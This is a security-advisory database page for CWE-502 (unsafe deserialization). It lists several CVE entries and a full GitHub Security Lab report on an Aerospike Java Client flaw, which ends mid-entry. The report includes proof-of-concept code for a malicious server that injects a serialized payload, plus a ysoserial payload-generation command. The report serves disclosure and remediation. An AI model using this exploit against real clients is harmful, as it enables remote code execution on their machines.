Common Weakness Enumeration

CWE-502

Allowed

Deserialization of Untrusted Data

Abstraction: Base · Status: Draft

The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

4801 vulnerabilities reference this CWE, most recent first.

GHSA-JJ49-FH67-68G7

Vulnerability from github – Published: 2025-12-24 00:30 – Updated: 2025-12-24 00:30
VLAI
Details

Tencent HunyuanDiT model_resume Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent HunyuanDiT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the model_resume function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27183.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-13707"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-23T22:15:45Z",
    "severity": "HIGH"
  },
  "details": "Tencent HunyuanDiT model_resume Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent HunyuanDiT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the model_resume function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27183.",
  "id": "GHSA-jj49-fh67-68g7",
  "modified": "2025-12-24T00:30:14Z",
  "published": "2025-12-24T00:30:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13707"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Tencent-Hunyuan/HunyuanDiT/commit/d2cb9cde5c9dc6a6c01735dcb92fe7699ddf6bc5"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1029"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JJ4H-R9CH-FMQV

Vulnerability from github – Published: 2025-12-24 00:30 – Updated: 2025-12-24 00:30
VLAI
Details

Tencent Hunyuan3D-1 load_pretrained Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent Hunyuan3D-1. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the load_pretrained function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27191.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-13713"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-23T22:15:46Z",
    "severity": "HIGH"
  },
  "details": "Tencent Hunyuan3D-1 load_pretrained Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent Hunyuan3D-1. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the load_pretrained function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27191.",
  "id": "GHSA-jj4h-r9ch-fmqv",
  "modified": "2025-12-24T00:30:14Z",
  "published": "2025-12-24T00:30:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13713"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Tencent-Hunyuan/Hunyuan3D-1/commit/454284503670312d4e06f6251c9be2f9f6d0fae7"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1027"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JJ95-55CR-9597

Vulnerability from github – Published: 2023-08-03 19:45 – Updated: 2023-08-08 22:15
VLAI
Summary
Aerospike Java Client vulnerable to unsafe deserialization of server responses
Details

GitHub Security Lab (GHSL) Vulnerability Report: GHSL-2023-044

The GitHub Security Lab team has identified a potential security vulnerability in Aerospike Java Client.

We are committed to working with you to help resolve this issue. In this report you will find everything you need to effectively coordinate a resolution of this issue with the GHSL team.

If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at securitylab@github.com (please include GHSL-2023-044 as a reference).

If you are NOT the correct point of contact for this report, please let us know!

Summary

The Aerospike Java client is a Java application that implements a network protocol to communicate with an Aerospike server. Some of the messages received from the server contain Java objects that the client deserializes when it encounters them without further validation. Attackers that manage to trick clients into communicating with a malicious server can include especially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running on.

Product

Aerospike Java Client

Tested Version

6.1.7

Details

Issue: Unsafe deserialization of server responses (GHSL-2023-044)

The Aerospike Java client implements different ways of communicating with an Aerospike server to perform several operations. Asynchronous commands can be executed using the Netty framework using the NettyCommand class. This class includes an InboundHandler that extends Netty's ChannelInboundHandlerAdapter, which handles inbound data coming from the Netty channel established with the server. This is implemented in the channelRead method:

client/src/com/aerospike/client/async/NettyCommand.java:1157

@Override
public void channelRead(ChannelHandlerContext ctx, Object msg) {
    command.read((ByteBuf)msg);
}

The incoming msg object is handled by the NettyCommand.read method, which behaves differently depending on the state variable. Several states produce paths to the vulnerable code — for instance, we will follow the path through AsyncCommand.COMMAND_READ_HEADER:

/client/src/com/aerospike/client/async/NettyCommand.java:489

private void read(ByteBuf byteBuffer) {
    eventReceived = true;

    try {
        switch (state) {
            // --snip--
            case AsyncCommand.COMMAND_READ_HEADER:
                if (command.isSingle) {
                    readSingleHeader(byteBuffer);
                }
                // --snip--
        }
        // --snip--
    }
    // --snip---
}

Some bytes are read from the message buffer and saved in command.dataBuffer in the readSingleHeader method, after which parseSingleBody is called:

client/src/com/aerospike/client/async/NettyCommand.java:596

private void readSingleHeader(ByteBuf byteBuffer) {
    int readableBytes = byteBuffer.readableBytes();
    int dataSize = command.dataOffset + readableBytes;

    // --snip--

    byteBuffer.readBytes(command.dataBuffer, 0, dataSize);
    command.dataOffset = dataSize;

    if (command.dataOffset >= receiveSize) {
        parseSingleBody();
    }
}

parseSingleBody simply delegates on AsyncCommand.parseCommandResult, which unless the message is compressed, directly calls AsyncCommand.parseResult. The implementation of this method depends on the command type. For an AsyncRead command, we have the following:

client/src/com/aerospike/client/async/AsyncRead.java:68

@Override
protected final boolean parseResult() {
    validateHeaderSize();

    int resultCode = dataBuffer[dataOffset + 5] & 0xFF;
    int generation = Buffer.bytesToInt(dataBuffer, dataOffset + 6);
    int expiration = Buffer.bytesToInt(dataBuffer, dataOffset + 10);
    int fieldCount = Buffer.bytesToShort(dataBuffer, dataOffset + 18);
    int opCount = Buffer.bytesToShort(dataBuffer, dataOffset + 20);
    dataOffset += Command.MSG_REMAINING_HEADER_SIZE;

    if (resultCode == 0) {
        // --snip--
        skipKey(fieldCount);
        record = parseRecord(opCount, generation, expiration, isOperation);
        return true;
    }

It can be seen that several fields are read from the message's bytes, and then a call to Command.parseRecord happens:

client/src/com/aerospike/client/command/Command.java:2083

protected final Record parseRecord(
    int opCount,
    int generation,
    int expiration,
    boolean isOperation
)  {
    Map<String,Object> bins = new LinkedHashMap<>();

    for (int i = 0 ; i < opCount; i++) {
        int opSize = Buffer.bytesToInt(dataBuffer, dataOffset);
        byte particleType = dataBuffer[dataOffset + 5];
        byte nameSize = dataBuffer[dataOffset + 7];
        String name = Buffer.utf8ToString(dataBuffer, dataOffset + 8, nameSize);
        dataOffset += 4 + 4 + nameSize;

        int particleBytesSize = opSize - (4 + nameSize);
        Object value = Buffer.bytesToParticle(particleType, dataBuffer, dataOffset, particleBytesSize);

Buffer.bytesToParticle converts the remaining bytes in the data buffer depending on the particleType field. We're interested in the JBLOB case:

client/src/com/aerospike/client/command/Buffer.java:53

public static Object bytesToParticle(int type, byte[] buf, int offset, int len)
    throws AerospikeException {
        switch (type) {
            // --snip--
            case ParticleType.JBLOB:
                return Buffer.bytesToObject(buf, offset, len);

In bytesToObject, the deserialization of an object from the message bytes happens:

client/src/com/aerospike/client/command/Buffer.java:300

public static Object bytesToObject(byte[] buf, int offset, int length) {
    // --snip--
    try (ByteArrayInputStream bastream = new ByteArrayInputStream(buf, offset, length)) {
        try (ObjectInputStream oistream = new ObjectInputStream(bastream)) {
            return oistream.readObject();
        }
    }
    // --snip--
}

NOTE: Take into account that there exists a similar sink, that can be reached in a similar way, in Unpacker.unpackBlock:

client/src/com/aerospike/client/util/Unpacker.java:227

private T unpackBlob(int count) throws IOException, ClassNotFoundException {
    // --snip--
    case ParticleType.JBLOB:
        // --snip--
        try (ByteArrayInputStream bastream = new ByteArrayInputStream(buffer, offset, count)) {
            try (ObjectInputStream oistream = new ObjectInputStream(bastream)) {
                val = getJavaBlob(oistream.readObject());
            }
        }

This vulnerability was discovered with the help of CodeQL.

Impact

This issue may lead to Remote Code Execution (RCE) in the Java client.

Remediation

Avoid deserialization of untrusted data if at all possible. If the architecture permits it then use other formats instead of serialized objects, for example JSON or XML. However, these formats should not be deserialized into complex objects because this provides further opportunities for attack. For example, XML-based deserialization attacks are possible through libraries such as XStream and XmlDecoder.

Alternatively, a tightly controlled whitelist can limit the vulnerability of code but be aware of the existence of so-called Bypass Gadgets, which can circumvent such protection measures.

Resources

To exploit this vulnerability, a malicious Aerospike server is needed. For the sake of simplicity, we implemented a mock server with hardcoded responses, with the only goal of reaching the vulnerable code of the client. To be able to easily reproduce this, we used the client's examples with the -netty flag, specifically the AsyncPutGet, which uses an AsyncRead. The examples point to localhost:3000 by default, so we set up a simple Netty TCP server listening on that port, which replicates responses previously intercepted from a real Aerospike server and returns them to the client, until the AsyncRead command happens. Then, our server injects the malicious response:

public class AttackChannelHandler extends SimpleChannelInboundHandler<String> {

    @Override
    protected void channelRead0(ChannelHandlerContext ctx, String s) throws Exception {
        // --snip--
        if (s.getBytes()[7] == 0x44) {
            AttackMessage m = new AttackMessage(
                    Files.readAllBytes(Paths.get("location/of/deserialization/payload.bin")));
            ctx.channel().writeAndFlush(m);
            return;
        }
        // --snip--
    }
}

AttackMessage is a class that hardcodes the necessary data to deliver the payload:

public class AttackMessage {

    private byte resultCode = 0;
    private int generation = 2;
    private int expiration = 417523457;
    private short fieldCount = 0;
    private short opCount = 1;
    private byte particleType = 7;
    private String name = "putgetbin";
    private byte[] payload;

    public AttackMessage(byte[] payload) {
        this.payload = payload;
    }

    // --snip-- (getters)

    public int[] getSize() {
        int size = 30 + name.length() + payload.length;
        int low = (byte) (size & 0xFF);
        int high = (byte) (size >> 8) & 0xFF;
        return new int[] {high, low};
    }

    public int getOpSize() {
        return payload.length + 4 + name.length();
    }

    public byte[] getPayload() {
        return payload;
    }
}

And it's finally encoded and delivered to the client through the network using a MessageToByteEncoder from Netty:

public class AttackMessageEncoder extends MessageToByteEncoder<AttackMessage> {

    @Override
    protected void encode(ChannelHandlerContext ctx, AttackMessage msg, ByteBuf out)
            throws Exception {
        // header
        out.writeBytes(new byte[] {0x02, 0x03, 0x00, 0x00, 0x00, 0x00});
        int[] length = msg.getSize();
        out.writeByte(length[0]);
        out.writeByte(length[1]);

        out.writeBytes(new byte[] {0x16, 0x00, 0x00, 0x00, 0x00});
        out.writeByte(msg.getResultCode());
        out.writeInt(msg.getGeneration());
        out.writeInt(msg.getExpiration());

        out.writeBytes(new byte[] {0x00, 0x00, 0x00, 0x00});
        out.writeShort(msg.getFieldCount());
        out.writeShort(msg.getOpCount());
        out.writeInt(msg.getOpSize());

        out.writeByte(0x01);
        out.writeByte(msg.getParticleType());

        out.writeByte(0x00);
        out.writeByte(msg.getName().length());
        out.writeCharSequence(msg.getName(), Charset.defaultCharset());
        out.writeBytes(msg.getPayload());
    }

}

The specific deserialization payload that needs to be used depends on the deserialization gadgets available in the classpath of the application using the Aerospike client. Again, for simplicity, we assumed the victim application uses Apache Commons Collections 4.0, which contains a well-known deserialization gadget:

<dependency>
  <groupId>org.apache.commons</groupId>
  <artifactId>commons-collections4</artifactId>
  <version>4.0</version>
</dependency>

In which case, the malicious payload file could be generated using ysoserial as follows:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 '/System/Applications/Calculator.app/Contents/MacOS/Calculator' > payload.bin

GitHub Security Advisories

We recommend you create a private GitHub Security Advisory for this finding. This also allows you to invite the GHSL team to collaborate and further discuss this finding in private before it is published.

Credit

This issue was discovered and reported by the GitHub CodeQL team members @atorralba (Tony Torralba) and @joefarebrother (Joseph Farebrother).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-044 in any communication regarding this issue.

Disclosure Policy

This report is subject to our coordinated disclosure policy.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.aerospike:aerospike-client"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.aerospike:aerospike-client"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.aerospike:aerospike-client"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.5.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-36480"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-08-03T19:45:39Z",
    "nvd_published_at": "2023-08-04T15:15:10Z",
    "severity": "CRITICAL"
  },
  "details": "# GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2023-044`\n\nThe [GitHub Security Lab](https://securitylab.github.com) team has identified a potential security vulnerability in [Aerospike Java Client](https://github.com/aerospike/aerospike-client-java/).\n\nWe are committed to working with you to help resolve this issue. In this report you will find everything you need to effectively coordinate a resolution of this issue with the GHSL team.\n\nIf at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2023-044` as a reference).\n\nIf you are _NOT_ the correct point of contact for this report, please let us know!\n\n## Summary\n\nThe Aerospike Java client is a Java application that implements a network protocol to communicate with an Aerospike server. Some of the messages received from the server contain Java objects that the client deserializes when it encounters them without further validation. Attackers that manage to trick clients into communicating with a malicious server can include especially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running on.\n\n## Product\n\nAerospike Java Client\n\n## Tested Version\n\n[6.1.7](https://github.com/aerospike/aerospike-client-java/releases/tag/6.1.7)\n\n## Details\n\n### Issue: Unsafe deserialization of server responses (`GHSL-2023-044`)\n\nThe Aerospike Java client implements different ways of communicating with an Aerospike server to perform several operations. Asynchronous commands can be executed using the Netty framework using the `NettyCommand` class. This class includes an `InboundHandler` that extends Netty\u0027s `ChannelInboundHandlerAdapter`, which handles inbound data coming from the Netty channel established with the server. This is implemented in the `channelRead` method:\n\n[`client/src/com/aerospike/client/async/NettyCommand.java:1157`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157)\n\n```java\n@Override\npublic void channelRead(ChannelHandlerContext ctx, Object msg) {\n    command.read((ByteBuf)msg);\n}\n```\n\nThe incoming `msg` object is handled by the `NettyCommand.read` method, which behaves differently depending on the `state` variable. Several states produce paths to the vulnerable code \u2014 for instance, we will follow the path through `AsyncCommand.COMMAND_READ_HEADER`:\n\n[`/client/src/com/aerospike/client/async/NettyCommand.java:489`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489)\n\n```java\nprivate void read(ByteBuf byteBuffer) {\n    eventReceived = true;\n\n    try {\n        switch (state) {\n            // --snip--\n            case AsyncCommand.COMMAND_READ_HEADER:\n                if (command.isSingle) {\n                    readSingleHeader(byteBuffer);\n                }\n                // --snip--\n        }\n        // --snip--\n    }\n    // --snip---\n}\n```\n\nSome bytes are read from the message buffer and saved in `command.dataBuffer` in the `readSingleHeader` method, after which `parseSingleBody` is called:\n\n[`client/src/com/aerospike/client/async/NettyCommand.java:596`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596)\n\n```java\nprivate void readSingleHeader(ByteBuf byteBuffer) {\n    int readableBytes = byteBuffer.readableBytes();\n    int dataSize = command.dataOffset + readableBytes;\n\n    // --snip--\n\n    byteBuffer.readBytes(command.dataBuffer, 0, dataSize);\n    command.dataOffset = dataSize;\n\n    if (command.dataOffset \u003e= receiveSize) {\n        parseSingleBody();\n    }\n}\n```\n\n`parseSingleBody` simply delegates on `AsyncCommand.parseCommandResult`, which unless the message is compressed, directly calls `AsyncCommand.parseResult`. The implementation of this method depends on the command type. For an `AsyncRead` command, we have the following:\n\n[`client/src/com/aerospike/client/async/AsyncRead.java:68`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68)\n\n```java\n@Override\nprotected final boolean parseResult() {\n    validateHeaderSize();\n\n    int resultCode = dataBuffer[dataOffset + 5] \u0026 0xFF;\n    int generation = Buffer.bytesToInt(dataBuffer, dataOffset + 6);\n    int expiration = Buffer.bytesToInt(dataBuffer, dataOffset + 10);\n    int fieldCount = Buffer.bytesToShort(dataBuffer, dataOffset + 18);\n    int opCount = Buffer.bytesToShort(dataBuffer, dataOffset + 20);\n    dataOffset += Command.MSG_REMAINING_HEADER_SIZE;\n\n    if (resultCode == 0) {\n        // --snip--\n        skipKey(fieldCount);\n        record = parseRecord(opCount, generation, expiration, isOperation);\n        return true;\n    }\n```\n\nIt can be seen that several fields are read from the message\u0027s bytes, and then a call to `Command.parseRecord` happens:\n\n[`client/src/com/aerospike/client/command/Command.java:2083`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083)\n\n```java\nprotected final Record parseRecord(\n    int opCount,\n    int generation,\n    int expiration,\n    boolean isOperation\n)  {\n    Map\u003cString,Object\u003e bins = new LinkedHashMap\u003c\u003e();\n\n    for (int i = 0 ; i \u003c opCount; i++) {\n        int opSize = Buffer.bytesToInt(dataBuffer, dataOffset);\n        byte particleType = dataBuffer[dataOffset + 5];\n        byte nameSize = dataBuffer[dataOffset + 7];\n        String name = Buffer.utf8ToString(dataBuffer, dataOffset + 8, nameSize);\n        dataOffset += 4 + 4 + nameSize;\n\n        int particleBytesSize = opSize - (4 + nameSize);\n        Object value = Buffer.bytesToParticle(particleType, dataBuffer, dataOffset, particleBytesSize);\n```\n\n`Buffer.bytesToParticle` converts the remaining bytes in the data buffer depending on the `particleType` field. We\u0027re interested in the `JBLOB` case:\n\n[`client/src/com/aerospike/client/command/Buffer.java:53`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53)\n\n```java\npublic static Object bytesToParticle(int type, byte[] buf, int offset, int len)\n    throws AerospikeException {\n        switch (type) {\n            // --snip--\n            case ParticleType.JBLOB:\n                return Buffer.bytesToObject(buf, offset, len);\n```\n\nIn `bytesToObject`, the deserialization of an object from the message bytes happens:\n\n[`client/src/com/aerospike/client/command/Buffer.java:300`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L300)\n\n```java\npublic static Object bytesToObject(byte[] buf, int offset, int length) {\n    // --snip--\n    try (ByteArrayInputStream bastream = new ByteArrayInputStream(buf, offset, length)) {\n        try (ObjectInputStream oistream = new ObjectInputStream(bastream)) {\n            return oistream.readObject();\n        }\n    }\n    // --snip--\n}\n```\n\nNOTE: Take into account that there exists a similar sink, that can be reached in a similar way, in `Unpacker.unpackBlock`:\n\n[`client/src/com/aerospike/client/util/Unpacker.java:227`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227)\n\n```java\nprivate T unpackBlob(int count) throws IOException, ClassNotFoundException {\n    // --snip--\n    case ParticleType.JBLOB:\n        // --snip--\n        try (ByteArrayInputStream bastream = new ByteArrayInputStream(buffer, offset, count)) {\n            try (ObjectInputStream oistream = new ObjectInputStream(bastream)) {\n                val = getJavaBlob(oistream.readObject());\n            }\n        }\n```\n\nThis vulnerability was discovered with the help of [CodeQL](https://codeql.github.com/).\n\n#### Impact\n\nThis issue may lead to Remote Code Execution (RCE) in the Java client.\n\n#### Remediation\n\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it then use other formats instead of serialized objects, for example JSON or XML.  However, these formats should not be deserialized into complex objects because this provides further opportunities for attack. For example, XML-based deserialization attacks are possible through libraries such as XStream and XmlDecoder.\n\nAlternatively, a tightly controlled whitelist can limit the vulnerability of code but be aware of the existence of so-called Bypass Gadgets, which can circumvent such protection measures.\n\n#### Resources\n\nTo exploit this vulnerability, a malicious Aerospike server is needed. For the sake of simplicity, we implemented a mock server with hardcoded responses, with the only goal of reaching the vulnerable code of the client. To be able to easily reproduce this, we used the client\u0027s examples with the `-netty` flag, specifically the `AsyncPutGet`, which uses an `AsyncRead`. The examples point to `localhost:3000` by default, so we set up a simple Netty TCP server listening on that port, which replicates responses previously intercepted from a real Aerospike server and returns them to the client, until the `AsyncRead` command happens. Then, our server injects the malicious response:\n\n```java\npublic class AttackChannelHandler extends SimpleChannelInboundHandler\u003cString\u003e {\n\n    @Override\n    protected void channelRead0(ChannelHandlerContext ctx, String s) throws Exception {\n        // --snip--\n        if (s.getBytes()[7] == 0x44) {\n            AttackMessage m = new AttackMessage(\n                    Files.readAllBytes(Paths.get(\"location/of/deserialization/payload.bin\")));\n            ctx.channel().writeAndFlush(m);\n            return;\n        }\n        // --snip--\n    }\n}\n```\n\n`AttackMessage` is a class that hardcodes the necessary data to deliver the payload:\n\n```java\npublic class AttackMessage {\n\n    private byte resultCode = 0;\n    private int generation = 2;\n    private int expiration = 417523457;\n    private short fieldCount = 0;\n    private short opCount = 1;\n    private byte particleType = 7;\n    private String name = \"putgetbin\";\n    private byte[] payload;\n\n    public AttackMessage(byte[] payload) {\n        this.payload = payload;\n    }\n\n    // --snip-- (getters)\n\n    public int[] getSize() {\n        int size = 30 + name.length() + payload.length;\n        int low = (byte) (size \u0026 0xFF);\n        int high = (byte) (size \u003e\u003e 8) \u0026 0xFF;\n        return new int[] {high, low};\n    }\n\n    public int getOpSize() {\n        return payload.length + 4 + name.length();\n    }\n\n    public byte[] getPayload() {\n        return payload;\n    }\n}\n```\n\nAnd it\u0027s finally encoded and delivered to the client through the network using a `MessageToByteEncoder` from Netty:\n\n```java\npublic class AttackMessageEncoder extends MessageToByteEncoder\u003cAttackMessage\u003e {\n\n    @Override\n    protected void encode(ChannelHandlerContext ctx, AttackMessage msg, ByteBuf out)\n            throws Exception {\n        // header\n        out.writeBytes(new byte[] {0x02, 0x03, 0x00, 0x00, 0x00, 0x00});\n        int[] length = msg.getSize();\n        out.writeByte(length[0]);\n        out.writeByte(length[1]);\n\n        out.writeBytes(new byte[] {0x16, 0x00, 0x00, 0x00, 0x00});\n        out.writeByte(msg.getResultCode());\n        out.writeInt(msg.getGeneration());\n        out.writeInt(msg.getExpiration());\n\n        out.writeBytes(new byte[] {0x00, 0x00, 0x00, 0x00});\n        out.writeShort(msg.getFieldCount());\n        out.writeShort(msg.getOpCount());\n        out.writeInt(msg.getOpSize());\n\n        out.writeByte(0x01);\n        out.writeByte(msg.getParticleType());\n\n        out.writeByte(0x00);\n        out.writeByte(msg.getName().length());\n        out.writeCharSequence(msg.getName(), Charset.defaultCharset());\n        out.writeBytes(msg.getPayload());\n    }\n\n}\n```\n\nThe specific deserialization payload that needs to be used depends on the deserialization gadgets available in the classpath of the application using the Aerospike client. Again, for simplicity, we assumed the victim application uses Apache Commons Collections 4.0, which contains a well-known deserialization gadget:\n\n```xml\n\u003cdependency\u003e\n  \u003cgroupId\u003eorg.apache.commons\u003c/groupId\u003e\n  \u003cartifactId\u003ecommons-collections4\u003c/artifactId\u003e\n  \u003cversion\u003e4.0\u003c/version\u003e\n\u003c/dependency\u003e\n```\n\nIn which case, the malicious payload file could be generated using [`ysoserial`](https://github.com/frohoff/ysoserial) as follows:\n\n```\njava -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 \u0027/System/Applications/Calculator.app/Contents/MacOS/Calculator\u0027 \u003e payload.bin\n```\n\n## GitHub Security Advisories\n\nWe recommend you create a private [GitHub Security Advisory](https://help.github.com/en/github/managing-security-vulnerabilities/creating-a-security-advisory) for this finding. This also allows you to invite the GHSL team to collaborate and further discuss this finding in private before it is [published](https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory).\n\n## Credit\n\nThis issue was discovered and reported by the GitHub CodeQL team members [@atorralba (Tony Torralba)](https://github.com/atorralba) and [@joefarebrother (Joseph Farebrother)](https://github.com/joefarebrother).\n\n## Contact\n\nYou can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2023-044` in any communication regarding this issue.\n\n## Disclosure Policy\n\nThis report is subject to our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).",
  "id": "GHSA-jj95-55cr-9597",
  "modified": "2023-08-08T22:15:13Z",
  "published": "2023-08-03T19:45:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36480"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/aerospike/aerospike-client-java"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227"
    },
    {
      "type": "WEB",
      "url": "https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Aerospike Java Client vulnerable to unsafe deserialization of server responses"
}

GHSA-JJ9F-2MF3-F7X2

Vulnerability from github – Published: 2022-07-20 00:00 – Updated: 2022-07-28 00:00
VLAI
Details

This issue affects: HYPR Windows WFA versions prior to 7.2; Unsafe Deserialization vulnerability in HYPR Workforce Access (WFA) before version 7.2 may allow local authenticated attackers to elevate privileges via a malicious serialized payload.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-1984"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-07-19T15:15:00Z",
    "severity": "HIGH"
  },
  "details": "This issue affects: HYPR Windows WFA versions prior to 7.2; Unsafe Deserialization vulnerability in HYPR Workforce Access (WFA) before version 7.2 may allow local authenticated attackers to elevate privileges via a malicious serialized payload.",
